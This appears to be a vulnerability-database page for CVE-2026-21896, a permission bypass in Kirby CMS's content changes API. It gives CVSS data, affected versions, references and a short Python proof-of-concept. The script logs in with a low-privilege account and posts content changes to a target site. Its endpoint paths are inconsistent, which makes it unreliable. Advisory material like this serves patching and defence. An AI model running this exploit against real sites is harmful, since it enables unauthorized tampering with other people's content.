CVE-2026-21896

Description

Kirby is an open-source content management system. From versions 5.0.0 to 5.2.1, Kirby is missing permission checks in the content changes API. This vulnerability affects all Kirby sites where user permissions are configured to prevent specific role(s) from performing write actions, specifically by disabling the update permission with the intent to prevent modifications to site content. This vulnerability does not affect those who have not altered the deviated from default user permissions. This issue has been patched in version 5.2.2.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:* - VULNERABLE

Kirby CMS 5.0.0

Kirby CMS 5.0.1

Kirby CMS 5.0.2

Kirby CMS 5.0.3

Kirby CMS 5.1.0

Kirby CMS 5.1.1

Kirby CMS 5.1.2

Kirby CMS 5.1.3

Kirby CMS 5.1.4

Kirby CMS 5.1.5

Kirby CMS 5.2.0

Kirby CMS 5.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-21896 PoC - Kirby CMS Permission Bypass in Content Changes API
# Target: Kirby CMS versions 5.0.0 to 5.2.1

TARGET_URL = "http://target-website.com"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"

def exploit_kirby_permission_bypass():
    """
    This PoC demonstrates the permission bypass vulnerability in Kirby's content changes API.
    A user with update permission disabled can still modify content via this API endpoint.
    """
    session = requests.Session()
    
    # Step 1: Authenticate with low-privilege account
    login_url = f"{TARGET_URL}/kirby/api/auth/login"
    login_data = {
        "email": USERNAME,
        "password": PASSWORD
    }
    
    response = session.post(login_url, json=login_data)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Attempt to modify content via content changes API
    # This should fail if permissions are properly checked, but succeeds due to the vulnerability
    content_api_url = f"{TARGET_URL}/api/content/changes"
    
    exploit_data = {
        "page": "configurable-page-id",
        "content": {
            "title": "Malicious Content Modified via Bypass",
            "text": "This content was modified despite update permission being disabled"
        }
    }
    
    response = session.post(content_api_url, json=exploit_data)
    
    if response.status_code == 200:
        print("[+] Content modification successful - Permission bypass confirmed!")
        print(f"[+] Response: {response.json()}")
        return True
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        return False

if __name__ == "__main__":
    exploit_kirby_permission_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21896
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21896
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21896/
[4] VulDB https://vuldb.com/cve/CVE-2026-21896
[5] https://github.com/getkirby/kirby/commit/f5ce1347b427b819bf193acf11fd0da232f7af47
[6] https://github.com/getkirby/kirby/releases/tag/5.2.2
[7] https://github.com/getkirby/kirby/security/advisories/GHSA-4j78-4xrm-cr2f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21896", "sourceIdentifier": "[email protected]", "published": "2026-01-08T18:15:59.593", "lastModified": "2026-02-02T19:02:51.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kirby is an open-source content management system. From versions 5.0.0 to 5.2.1, Kirby is missing permission checks in the content changes API. This vulnerability affects all Kirby sites where user permissions are configured to prevent specific role(s) from performing write actions, specifically by disabling the update permission with the intent to prevent modifications to site content. This vulnerability does not affect those who have not altered the deviated from default user permissions. This issue has been patched in version 5.2.2."}, {"lang": "es", "value": "Kirby es un sistema de gestión de contenido de código abierto. Desde las versiones 5.0.0 hasta la 5.2.1, Kirby carece de comprobaciones de permisos en la API de cambios de contenido. Esta vulnerabilidad afecta a todos los sitios de Kirby donde los permisos de usuario están configurados para evitar que rol(es) específico(s) realicen acciones de escritura, específicamente deshabilitando el permiso de actualización con la intención de prevenir modificaciones al contenido del sitio. Esta vulnerabilidad no afecta a aquellos que no han alterado los permisos de usuario predeterminados. Este problema ha sido parcheado en la versión 5.2.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.2.2", "matchCriteriaId": "E9AE695A-D212-4B4E-B595-71C44FE6EE2A"}]}]}], "references": [{"url": "https://github.com/getkirby/kirby/commit/f5ce1347b427b819bf193acf11fd0da232f7af47", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/getkirby/kirby/releases/tag/5.2.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/getkirby/kirby/security/advisories/GHSA-4j78-4xrm-cr2f", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}